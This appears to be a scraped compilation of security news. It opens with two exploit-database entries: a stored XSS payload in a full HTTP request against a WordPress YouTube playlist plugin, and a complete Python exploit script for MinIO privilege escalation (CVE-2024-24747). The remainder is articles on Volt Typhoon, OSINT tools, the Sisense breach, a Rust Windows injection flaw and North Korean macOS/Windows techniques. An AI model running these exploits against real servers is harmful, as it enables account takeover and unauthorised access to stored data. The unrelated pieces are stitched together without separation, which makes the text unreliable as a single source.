WordPress Playlist for Youtube plugin version 1.32 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)# Date: 22 March 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.32# Proof Of Concept:1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns# Vulnerable Properties name: name, playlist_id# Payload: "><script>alert(document.cookie)</script># Request:POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 178Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_freeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, i_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000

WordPress Playlist For Youtube 1.32 Cross Site Scripting

MinIO versions prior to 2024-01-31T20-20-33Z suffer from a privilege escalation vulnerability.

    # Exploit Title: MinIO < 2024-01-31T20-20-33Z -  Privilege Escalation# Date: 2024-04-11# Exploit Author: Jenson Zhao# Vendor Homepage: https://min.io/# Software Link: https://github.com/minio/minio/# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z# Tested on: Windows 10# CVE : CVE-2024-24747# Required before execution: pip install minio,requestsimport argparseimport datetimeimport tracebackimport urllibfrom xml.dom.minidom import parseStringimport requestsimport jsonimport base64from minio.credentials import Credentialsfrom minio.signer import sign_v4_s3class CVE_2024_24747:    new_buckets = []    old_buckets = []    def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):        self.bucket_names = ['pocpublic', 'pocprivate']        self.new_accesskey = 'miniocvepoc'        self.new_secretkey = 'MINIOcvePOC'        self.headers = {          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',          'Content-Type': 'application/json',          'Accept': '*/*'        }        self.accesskey = accesskey        self.secretkey = secretkey        self.verify = verify        if verify:            self.url = "https://" + host + ":" + port            self.console_url = "https://" + host + ":" + console_port        else:            self.url = "http://" + host + ":" + port            self.console_url = "http://" + host + ":" + console_port        self.credits = Credentials(            access_key=self.new_accesskey,            secret_key=self.new_secretkey        )        self.login()        try:            self.create_buckets()            self.create_accesskey()            self.old_buckets = self.console_ls()            self.console_exp()            self.new_buckets = self.console_ls()        except:            traceback.print_stack()        finally:            self.delete_accesskey()            self.delete_buckets()            if len(self.new_buckets) > len(self.old_buckets):                print("There is CVE-2024-24747 problem with the minio!")                print("Before the exploit, the buckets are : " + str(self.old_buckets))                print("After the exploit, the buckets are : " + str(self.new_buckets))            else:                print("There is no CVE-2024-24747 problem with the minio!")    def login(self):        url = self.url + "/api/v1/login"        payload = json.dumps({          "accessKey": self.accesskey,          "secretKey": self.secretkey        })        self.session = requests.session()        if self.verify:            self.session.verify = False        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 204:            status_code = 0        else:            print('Login failed! Please check if the input accesskey and secretkey are correct!')            exit(1)    def create_buckets(self):        url = self.url + "/api/v1/buckets"        for name in self.bucket_names:            payload = json.dumps({                "name": name,                "versioning": False,                "locking": False            })            status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code            # print(status_code)            if status_code == 200:                status_code = 0            else:                print("新建 (New)"+name+" bucket 失败 (fail)！")    def delete_buckets(self):        for name in self.bucket_names:            url = self.url + "/api/v1/buckets/" + name            status_code = self.session.request("DELETE", url, headers=self.headers).status_code            # print(status_code)            if status_code == 204:                status_code = 0            else:                print("删除 (delete)"+name+" bucket 失败 (fail)！")    def create_accesskey(self):        url = self.url + "/api/v1/service-account-credentials"        payload = json.dumps({            "policy": "{              \n    \"Version\":\"2012-10-17\",              \n    \"Statement\":[              \n        {              \n            \"Effect\":\"Allow\",              \n            \"Action\":[              \n                \"s3:*\"              \n            ],              \n            \"Resource\":[              \n                \"arn:aws:s3:::pocpublic\",              \n                \"arn:aws:s3:::pocpublic/*\"              \n            ]              \n        }              \n    ]              \n}",            "accessKey": self.new_accesskey,            "secretKey": self.new_secretkey        })        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 201:            # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)！")            # print(self.new_secretkey)            status_code = 0        else:            print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)！")    def delete_accesskey(self):        url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')        status_code = self.session.request("DELETE", url, headers=self.headers).status_code        # print(status_code)        if status_code == 204:            # print("删除" + self.new_accesskey + " accessKey成功！")            status_code = 0        else:            print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)！")    def headers_gen(self,url,sha256,method):        datetimes = datetime.datetime.utcnow()        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')        urls = urllib.parse.urlparse(url)        headers = {            'X-Amz-Content-Sha256': sha256,            'X-Amz-Date': datetime_str,            'Host': urls.netloc,        }        headers = sign_v4_s3(            method=method,            url=urls,            region='us-east-1',            headers=headers,            credentials=self.credits,            content_sha256=sha256,            date=datetimes,        )        return headers    def console_ls(self):        url = self.console_url + "/"        sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"        headers = self.headers_gen(url,sha256,'GET')        if self.verify:            response = requests.get(url,headers=headers,verify=False)        else:            response = requests.get(url, headers=headers)        DOMTree = parseString(response.text)        collection = DOMTree.documentElement        buckets = collection.getElementsByTagName("Bucket")        bucket_names = []        for bucket in buckets:            bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)        # print('当前可查看的bucket有:\n' + str(bucket_names))        return bucket_names    def console_exp(self):        url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey        sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"        headers = self.headers_gen(url, sha256, 'POST')        hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"        content = bytes.fromhex(hex_string)        if self.verify:            response = requests.post(url,headers=headers,data=content,verify=False)        else:            response = requests.post(url,headers=headers,data=content)        status_code = response.status_code        if status_code == 204:            # print("提升" + self.new_accesskey + " 权限成功！")            status_code = 0        else:            print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)！")if __name__ == '__main__':    logo = """                            ____    ___   ____   _  _           ____   _  _    _____  _  _    _____   ___ __   __  ___        |___ \  / _ \ |___ \ | || |         |___ \ | || |  |___  || || |  |___  | / __|\ \ / / / _ \ _____   __) || | | |  __) || || |_  _____   __) || || |_    / / | || |_    / / | (__  \ V / |  __/|_____| / __/ | |_| | / __/ |__   _||_____| / __/ |__   _|  / /  |__   _|  / /   \___|  \_/   \___|       |_____| \___/ |_____|   |_|         |_____|   |_|   /_/      |_|   /_/                               """    print(logo)    parser = argparse.ArgumentParser()    parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")    parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")    parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")    parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")    args = parser.parse_args()    CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)

MinIO Privilege Escalation

Attacks on critical infrastructure are ramping up — but organizations now have the knowledge and tools needed to defend against them.

Sean Tufts, Managing Partner for Critical Infrastructure, Optiv

April 12, 2024

4 Min Read

Source: Andrii Yalanskyi via Alamy Stock Photo

COMMENTARY

Recent headlines around Volt Typhoon, a state-sponsored Chinese threat actor targeting US critical infrastructure, have caused alarm over attacker dwell time and put critical infrastructure security in the spotlight. The group targets network infrastructure devices to gain access to critical infrastructure organizations and then uses living-off-the-land techniques to lurk on victims' environments to position themselves for future attacks. Volt Typhoon has been known to target the communications, energy, water, and transportation sectors.

There's no question that critical infrastructure threats such as what we're seeing from Volt Typhoon are concerning and need to be taken seriously. Attacks on critical industries have the potential to cause widescale damage and disruption and can even put people's lives at risk — compromised water sources, gas lines, utilities and healthcare devices, for example, could have a life-threatening impact. Given the high stakes, critical infrastructure organizations need to strengthen security to keep people safe and the global economy working.

However, as someone who works on the front lines of critical infrastructure security, I believe that, rather than panicking about Volt Typhoon and the threats the group represents, we should focus on several positives:

*   Malware activity targeting critical infrastructure is custom and challenging. It takes many hands to build an effective package. We know this because we are unfortunately finding complex builds. The positive here, however, is that we are now looking for malware activity.
    
*   Many of the 16 CISA-defined critical infrastructure industries have matured their security defenses and are in a better position to defend against advanced threats than they were a few years ago. There is a long path to "secure," but we have better prevention and detection than we did in 2020.
    
*   It's not uncommon for malware to sit dormant for years until the time is right to strike. Knowing this, security operations center (SOC) teams have focused on threat detection, advancing their method for absorbing critical infrastructure, industry control system (ICS), and operational technology (OT) alerts, which has lowered malware dwell time and improved security overall.
    

**Focus Areas for Critical Infrastructure Sectors**

One of the biggest takeaways of the Volt Typhoon activity is that it's crucial for critical infrastructure organizations to conduct risk assessments frequently to see how threats against their company are changing and then use that intelligence to adapt their cybersecurity and cyber resilience strategies accordingly.

If you don't know a threat is there, you can't defend against it. And not all organizations are targeted with the same threats. Additionally, your biggest threat today may not be the greatest source of risk tomorrow. For all these reasons, frequently identifying and quantifying the unique risks to your organization is the first step to staying secure and cyber resilient.

Once the risk assessment is complete, you can then develop or refine your security plan accordingly. Because threats and business needs change all the time, this should be a living strategy. That said, there are a few security fundamentals that should always be prioritized, including:

*   Network segmentation: Divides the network into separate zones for different types of users and services. This approach helps contain attacks and limits the lateral movement of threats within the network.
    
*   Intrusion detection systems (IDS): Monitors network traffic for suspicious activity. This is important because traditional endpoint security tools aren't able to be installed on all network infrastructure devices.
    
*   Identity security: The optimal combination is secure remote access with privileged access management (PAM). The former allows users to safely connect to networks and prevents unauthorized access. The latter secures privileged user accounts that have high-level access to individual controllers in a critical site, so cyber attackers can't exploit them to move across the victim's environment.
    

**From Past to Present**

Five years ago, critical infrastructure security had very limited awareness, and headlines on activity from threat actors like Volt Typhoon would be alarming. We've come a long way since then, though — not only in recognizing risks to these sectors but also establishing cybersecurity benchmarks for keeping critical infrastructure organizations secure.

So, while it's true that attacks on critical infrastructure are ramping up, it's also true that organizations now have the knowledge and tools needed to defend against them. Organizations no longer need to be caught off guard. With risk assessments, security fundamentals, and advanced security strategies that target unique threats to the business, critical infrastructure organizations can build strong security programs that are able to withstand any type of attack and keep the organization cyber resilient.

**About the Author(s)**

Managing Partner for Critical Infrastructure, Optiv

Sean Tufts is a former NFL linebacker turned cybersecurity leader with more than 10 years of cyber experience and 15 years of ICS experience. As the managing partner for critical infrastructure at Optiv, he heads a business unit responsible for identifying, modernizing and securing critical infrastructure clients' most vital business functions and operational assets. Optiv's IoT/OT team delivers strategic end-to-end security expertise, underscored by Sean’s hands-on knowledge of cybersecurity best practices for industrial and critical settings, including energy, oil and gas, and healthcare. Prior to Optiv, Sean had a hand in developing more than 3,500 MW of wind energy farms for a private EPC. His operations experience allowed for a smooth transition over to General Electric in 2015, where he joined the recently acquired Wurldtech Cybersecurity team. In this role, Sean embedded cybersecurity programs into the rotating machinery controls for GE Power, GE O&G (BakerHughes) and GE Renewables.

Critical Infrastructure Security: Observations From the Front Lines

Identities now transcend human boundaries. Within each line of code and every API call lies a non-human identity. These entities act as programmatic access keys, enabling authentication and facilitating interactions among systems and services, which are essential for every API call, database query, or storage account access. As we depend on multi-factor authentication and passwords to safeguard

Code Keepers: Mastering Non-Human Identity Management

By Waqas
In this article, we will explore 12 paid and free OSINT tools that are publicly available and can be very useful when utilized properly and for appropriate purposes.
This is a post from HackRead.com Read the original post: Best Paid and Free OSINT Tools for 2024

Open Source Intelligence tools (or OSINT tools) are software applications or platforms used to collect, analyze, and interpret publicly available information from various online sources, aiding in investigations, research, and intelligence gathering.

These OSINT Tools assist in accessing and analyzing data from sources such as social media, websites, forums, and other public repositories to generate insights and support decision-making processes.

In this article, we will explore 12 paid and free OSINT tools that are publicly available and can be very useful when utilized properly and for appropriate purposes.

****1:** EpicVIN**

EpicVIN is a website dedicated to providing detailed vehicle history reports based on a vehicle’s VIN (Vehicle Identification Number) or license plate number. Established in 2012 and headquartered in Miami, Florida; the platform offers paid results with three packages starting from $14.99 for 1 report, $7.04 for 4 reports and $5.4 for 16 reports.

****2: Shodan****

Shodan is essentially a search engine for Internet-connected devices. It allows users to discover various types of devices, from routers to security cameras to servers, that are connected to the internet, providing valuable data about the security of these devices and potential vulnerabilities.

Shodan is available in free and paid packages.

****3: Telegogo****

Telegogo is a free Google-based search engine for Telegram. The tool can be used to search for public Telegram channels, groups, or content. Leveraging Google’s search capabilities helps users find Telegram-related information or discussions more efficiently than searching through Telegram’s own search features.

Telegogo is useful for anyone looking to explore public conversations or communities within Telegram around specific topics, making the platform’s vast amount of user-generated content more accessible and navigable. If you are looking for specific types of Telegram groups or channels, using a dedicated search tool like Telegogo could significantly streamline your search process.

****4\. GHunt****

GHunt is a free OSINT tool designed to extract information from any Google Account using an email address. The data that GHunt can gather includes:

*   Google ID
*   Owner’s name
*   Public photos (P)
*   Phones models (P)
*   Phones firmware
*   Installed Softwares
*   Google Maps reviews
*   Possible physical location
*   Possible YouTube channel
*   Possible other usernames
*   Events from Google Calendar
*   If the account is a Hangouts Bot
*   Last time the profile was edited
*   Activated Google services (YouTube, Photos, Maps, News360, Hangouts, etc.)

****5\. FOCA****

FOCA (Fingerprinting Organizations with Collected Archives) is a free OSINT tool used primarily for security auditing. It is designed to help security professionals analyze a domain’s security by finding metadata and hidden information in the documents they make available on their websites.

FOCA is popular among penetration testers and cybersecurity professionals for its ability to uncover information that can help in the early stages of a security audit or penetration test. It provides insights that can guide further testing and exploration including document analysis, metadata extraction, mapping and more.

****6\. SkopeNow****

Skopenow is a paid analytical search engine aimed at discovering and compiling digital identities from publicly available data. The platform uses various algorithms to aggregate information from social media, websites, and other online sources to create profiles that can be used for background checks, investigative purposes, and risk assessment. This can be particularly useful for professionals in law enforcement, fraud prevention, and corporate security to obtain insights into individuals’ online presence and behaviours.

****7\. Maltego****

Maltego is a powerful tool for performing real-time data mining and information gathering, as well as the visualization of this information in a graph format. Ideal for investigative purposes, it helps in identifying relationships and real-world links between pieces of information from various sources located on the Internet.

Maltego is available in free and paid packages.

****8\. Metagoofil****

Metagoofil is a metadata extraction tool that is used to analyze metadata of public documents (pdf, doc, xls, ppt, etc.) and to extract information that can be useful in an OSINT investigation. This tool can be used to gather data about the documents’ authors, creation dates, software used, and more.

****9\. Recon-ng****

Recon-ng is a full-featured free Web Reconnaissance framework written in Python. It provides a powerful environment in which open-source web-based reconnaissance can be conducted quickly and thoroughly. Recon-ng has a look and feels similar to the Metasploit Framework, reducing the learning curve significantly.

****10\. TheHarvester****

TheHarvester is a free OSINT tool for gathering e-mail accounts, subdomain names, virtual hosts, open ports/ banners, and employee names from different public sources (search engines, key servers). This tool is particularly useful in the early stages of a penetration test to understand the human element of cybersecurity.

****11\. Arrests.org****

Arrests.org is a free website aggregating booking and arrest records from various public law enforcement agencies across the United States. The site typically displays mugshots, personal information such as age and gender, and details of the charges against the individuals listed. These records are pulled from publicly available sources, such as county sheriff’s offices and police departments.

Therefore, this site can serve as a perfect OSINT tool for researchers, journalists, security professionals, and the general public seeking intelligence or information about individuals’ arrest histories. Additionally, the accessibility and range of data available on Arrests.org make it a useful tool for conducting background checks, investigating criminal activity, or monitoring crime trends, all of which are key aspects of OSINT research

****12\. OSINT Framework****

OSINT Framework is not a tool in itself, but rather a free collection of OSINT tools that can be used for specific purposes. It organizes tools based on the type of data you are interested in and the goal of your investigation, making it an invaluable resource for anyone conducting OSINT.

1.  New tool detects fake 4G cell phone towers
2.  8 Online Best Dark Web Search Engines for Tor Browser
3.  What Are Dark Web Search Engines and How to Find Them?
4.  New tool lets teens report, remove their nude photos online
5.  CISA Publishes List of Free Cybersecurity Tools and Services
6.  Building Your Defense Toolbox: Tools to Combat Cyber Threats
7.  Temporary Phone Number: An Essential Tool for Privacy Protection

Best Paid and Free OSINT Tools for 2024

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said today it is investigating a breach at business intelligence company Sisense, whose products are designed to allow companies to view the status of multiple third-party online services in a single dashboard. CISA urged all Sisense customers to reset any credentials and secrets that may have been shared with the company, which is the same advice Sisense gave to its customers Wednesday evening.

The **U.S. Cybersecurity and Infrastructure Security Agency** (CISA) said today it is investigating a breach at business intelligence company **Sisense**, whose products are designed to allow companies to view the status of multiple third-party online services in a single dashboard. CISA urged all Sisense customers to reset any credentials and secrets that may have been shared with the company, which is the same advice Sisense gave to its customers Wednesday evening.

New York City based Sisense has more than a thousand customers across a range of industry verticals, including financial services, telecommunications, healthcare and higher education. On April 10, **Sisense Chief Information Security Officer Sangram Dash** told customers the company had been made aware of reports that “certain Sisense company information may have been made available on what we have been advised is a restricted access server (not generally available on the internet.)”

“We are taking this matter seriously and promptly commenced an investigation,” Dash continued. “We engaged industry-leading experts to assist us with the investigation. This matter has not resulted in an interruption to our business operations. Out of an abundance of caution, and while we continue to investigate, we urge you to promptly rotate any credentials that you use within your Sisense application.”

In its alert, CISA said it was working with private industry partners to respond to a recent compromise discovered by independent security researchers involving Sisense.

“CISA is taking an active role in collaborating with private industry partners to respond to this incident, especially as it relates to impacted critical infrastructure sector organizations,” the sparse alert reads. “We will provide updates as more information becomes available.”

Sisense declined to comment when asked about the veracity of information shared by two trusted sources with close knowledge of the breach investigation. Those sources said the breach appears to have started when the attackers somehow gained access to the company’s Gitlab code repository, and in that repository was a token or credential that gave the bad guys access to Sisense’s Amazon S3 buckets in the cloud.

Customers can use Gitlab either as a solution that is hosted in the cloud at Gitlab.com, or as a self-managed deployment. KrebsOnSecurity understands that Sisense was using the self-managed version of Gitlab.

Both sources said the attackers used the S3 access to copy and exfiltrate several terabytes worth of Sisense customer data, which apparently included millions of access tokens, email account passwords, and even SSL certificates.

The incident raises questions about whether Sisense was doing enough to protect sensitive data entrusted to it by customers, such as whether the massive volume of stolen customer data was ever encrypted while at rest in these Amazon cloud servers.

It is clear, however, that unknown attackers now have all of the credentials that Sisense customers used in their dashboards.

The breach also makes clear that Sisense is somewhat limited in the clean-up actions that it can take on behalf of customers, because access tokens are essentially text files on your computer that allow you to stay logged in for extended periods of time — sometimes indefinitely. And depending on which service we’re talking about, it may be possible for attackers to re-use those access tokens to authenticate as the victim without ever having to present valid credentials.

Beyond that, it is largely up to Sisense customers to decide if and when they change passwords to the various third-party services that they’ve previously entrusted to Sisense.

Earlier today, a public relations firm working with Sisense reached out to learn if KrebsOnSecurity planned to publish any further updates on their breach (KrebsOnSecurity posted a screenshot of the CISO’s customer email to both LinkedIn and Mastodon on Wednesday evening). The PR rep said Sisense wanted to make sure they had an opportunity to comment before the story ran.

But when confronted with the details shared by my sources, Sisense apparently changed its mind.

“After consulting with Sisense, they have told me that they don’t wish to respond,” the PR rep said in an emailed reply.

**Update, 6:49 p.m., ET:** Added clarification that Sisense is using a self-hosted version of Gitlab, not the cloud version managed by Gitlab.com.

Also, Sisense’s CISO Dash just sent an update to customers directly. The latest advice from the company is far more detailed, and involves resetting a potentially large number of access tokens across multiple technologies, including Microsoft Active Directory credentials, GIT credentials, web access tokens, and any single sign-on (SSO) secrets or tokens.

The full message from Dash to customers is below:

“Good Afternoon,

We are following up on our prior communication of April 10, 2024, regarding reports that certain Sisense company information may have been made available on a restricted access server. As noted, we are taking this matter seriously and our investigation remains ongoing.

Our customers must reset any keys, tokens, or other credentials in their environment used within the Sisense application.

Specifically, you should:  
– Change Your Password: Change all Sisense-related passwords on http://my.sisense.com  
– Non-SSO:  
– Replace the Secret in the Base Configuration Security section with your GUID/UUID.  
– Reset passwords for all users in the Sisense application.  
– Logout all users by running GET /api/v1/authentication/logout\_all under Admin user.  
– Single Sign-On (SSO):  
– If you use SSO JWT for the user’s authentication in Sisense, you will need to update sso.shared\_secret in Sisense and then use the newly generated value on the side of the SSO handler.  
– We strongly recommend rotating the x.509 certificate for your SSO SAML identity provider.  
– If you utilize OpenID, it’s imperative to rotate the client secret as well.  
– Following these adjustments, update the SSO settings in Sisense with the revised values.  
– Logout all users by running GET /api/v1/authentication/logout\_all under Admin user.  
– Customer Database Credentials: Reset credentials in your database that were used in the Sisense application to ensure continuity of connection between the systems.  
– Data Models: Change all usernames and passwords in the database connection string in the data models.  
– User Params: If you are using the User Params feature, reset them.  
– Active Directory/LDAP: Change the username and user password of users whose authorization is used for AD synchronization.  
– HTTP Authentication for GIT: Rotate the credentials in every GIT project.  
– B2D Customers: Use the following API PATCH api/v2/b2d-connection in the admin section to update the B2D connection.  
– Infusion Apps: Rotate the associated keys.  
– Web Access Token: Rotate all tokens.  
– Custom Email Server: Rotate associated credentials.  
– Custom Code: Reset any secrets that appear in custom code Notebooks.

If you need any assistance, please submit a customer support ticket at https://community.sisense.com/t5/support-portal/bd-p/SupportPortal and mark it as critical. We have a dedicated response team on standby to assist with your requests.

At Sisense, we give paramount importance to security and are committed to our customers’ success. Thank you for your partnership and commitment to our mutual security.

Regards,

Sangram Dash  
Chief Information Security Officer”

Why CISA is Warning CISOs About a Breach at Sisense

Project behind the Rust programming language asserted that any calls to a specific API would be made safe, even with unsafe inputs, but researchers found ways to circumvent the protections.

Source: Monticello via Shutterstock

The Rust Project has issued an update for its standard library, after a vulnerability researcher discovered a specific function used to execute batch files on Windows systems could be exploited using an injection flaw.

The set of common functions included with Rust programming language, known as the standard library, offers the ability — among its many other capabilities — to execute Windows batch files through the Command API. The function, however, did not process the inputs to the API rigorously enough to eliminate the possibility of injecting code into the execution, according to a Rust Security Response Working Group advisory published April 9.

While Rust is well known for its memory-safety features, the incident underscores that the programming language is not proof against logic bugs, says Yair Mizrahi, a senior vulnerability researcher at application-security firm JFrog.

"Overall, Rust's memory safety is a notable advantage, but developers must also pay close attention to the potential for logical bugs to ensure the overall security and reliability of their Rust-based applications," he says. "To address such logical issues, Rust encourages a rigorous testing and code review process, as well as the use of static analysis tools to identify and mitigate logical bugs."

Rust has gained a reputation for being a very secure programming language, because it does not leave applications open to the often-severe class of flaws known as memory-safety vulnerabilities. Google has attributed a drop in memory-unsafe code to the shift to memory-safe languages, such as Rust and Kotlin, while Microsoft found that up until 2018, when it shifted to memory-safe language, such vulnerabilities regularly accounted for 70% of all security issues.

**Windows Poses a Batch of Issues**

The latest issue is not a memory-safety vulnerability, but a problem with the logic used to process untrusted input. Part of Rust's standard library allows the developer to call a function to send a batch file to the Windows machine for processing. There are reasons for submitting code to the host as a batch file, says Joel Marcey, director of technology at Rust Foundation, which supports the programming language's maintainers and the Rust ecosystem.

"Batch files are run for many reasons on systems, and Rust provides an API to allow you to execute those fairly easily," he says. "So while this is not necessarily the most common use case for Rust, the API, before the fixed patch was implemented, allowed for malicious actors to theoretically take over your system by running arbitrary commands, and this is definitely a critical vulnerability."

Typically, a developer can forward a workload to the Windows host to be executed as a batch process through the Command applications programming interface (API), part of the standard library. Typically, Rust guarantees the safety of any call to the Command API, but in this case, the Rust Project could not find a way to prevent the execution of all arguments, primarily because Windows does not adhere to any sort of standard, and that the API could allow an attacker to submit code that would then be executed.

"Unfortunately it was reported that our escaping logic was not thorough enough, and it was possible to pass malicious arguments that would result in arbitrary shell execution," according to the Rust Security Response WG.

**Rust Project Proves Responsive**

While dealing with any vulnerability can be a headache, the Rust Project has shown that the group quickly resolves issues, say experts. The standard library vulnerability, CVE-2024-24576, is ultimately an issue with the Windows batch-processing problem and affects other programming languages, if they do not adequately parse the arguments sent to the Windows batch process. The Rust Project appears to be the first out the door with a fix for passing arguments to the Windows CMD.exe process, says JFrog's Mizrahi.

The groups could not completely eliminate the issue, but the Command API will not return an error when any augments passed to the function could be unsafe, the Rust Project said. 

JFrog's Mizrahi urges Rust to broaden its use of static application security testing and expand the use of fuzzing and dynamic testing.

"Overall, Rust is on the right track by emphasizing memory safety and encouraging rigorous testing practices," he says. "Combining these efforts with continued advancements in static analysis and fuzzing can help the Rust community and the broader software industry make significant strides in addressing logical bugs and input validation flaws in the years to come."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Critical Rust Flaw Poses Exploit Threat in Specific Windows Use Cases

North Korean hackers break ground with new exploitation techniques for Windows and macOS.

Source: Stuart Miles via Alamy Stock Photo

This month, MITRE will be adding two sub-techniques to its ATT&CK database that have been widely exploited by North Korean threat actors.

The first, not entirely new, sub-technique involves manipulation of Transparency, Consent, and Control (TCC), a security protocol that regulates application permissions on Apple's macOS.

The other — called "phantom" dynamic link library (DLL) hijacking — is a lesser-known subset of DLL hijacking, where hackers take advantage of referenced but nonexistent DLL files in Windows.

Both TCC manipulation and phantom DLL hijacking have allowed North Korean hackers to gain privileged access into macOS and Windows environments, respectively, from which they could perform espionage and other post-exploitation actions.

**TCC Manipulation**

"North Korea is opportunistic," says Marina Liang, threat intelligence engineer at Interpres Security. "They have a dual purpose of espionage and also revenue generation, so they're going to look to be where their targets are. And because macOS is increasing in popularity, that's where they started to pivot."

One way North Korean advanced persistent threats (APTs) have been breaching Macs lately is via TCC, an essential framework for controlling application permissions.

TCC has a user- and system-level database. The former is protected with permissions — a user would require Full Disk Access (FDA), or something similar — and the latter by System Integrity Protection (SIP), a feature first introduced with macOS Sierra. Theoretically, privileges and SIP are guards against malicious TCC access.

In practice, however, there are scenarios where each can be undermined. Administrators and security apps, for example, might require FDA to properly function. And there are times when users circumvent SIP.

"When developers need flexibility on their machine, or they're being blocked by the operating system, they might decrease those controls that Apple has in place to allow them to code and create software," Liang explains. "Anecdotally, I've seen that developers troubleshooting will try to figure out what's in place \[on the system\], and disable it to see if that solves their issue."

When SIP is switched off, or FDA on, attackers have a window to access the TCC database and grant themselves permissions without alerting the user.

There are a number of other ways to potentially get through TCC, too. For example, some sensitive directories such as /tmp fall outside of TCC's domain entirely. The Finder app has FDA enabled by default, and it's not listed in the user's Security & Privacy window, meaning that a user would have to be independently aware and manually revoke its permissions. Attackers can also use social engineering to direct users in disabling security controls.

A number of malware tools have been designed to manipulate TCC, including Bundlore, BlueBlood, Callisto, JokerSpy, XCSSET, and other unnamed macOS Trojans recorded on VirusTotal. Liang identified Lazarus Group malware, which attempts to dump the access table from the TCC database, and CloudMensis by APT37 (aka InkSquid, RedEyes, BadRAT, Reaper, or ScarCruft) doggedly tries to identify where SIP is disabled in order to load its own malicious database.

Dark Reading contacted Apple for a statement regarding TCC abuses and received no reply.

To block attackers taking advantage of TCC, the most important thing is keeping SIP enabled. Short of that, Liang highlights the need to know which apps have what permissions in your system. "It's being aware of what you're granting permissions to. And then — obviously it's easier said than done — exercising \[the principle of\] least privileged \[access\]. If certain apps don't necessarily need certain permissions to function, then remove them," she says.

Besides TCC vulnerabilities, APAC-area threat actors have been exploiting an even stranger flaw in Windows. For some reason, the operating system references a number of DLL files that don't actually exist.

"There are a ton of them," Liang marvels. "Maybe someone was working on a project to create specific DLLs for specific purposes, and maybe it got shelved, or they didn't have enough resources, or just forgot about it."

Dark Reading has reached out to Microsoft for clarification on this point.

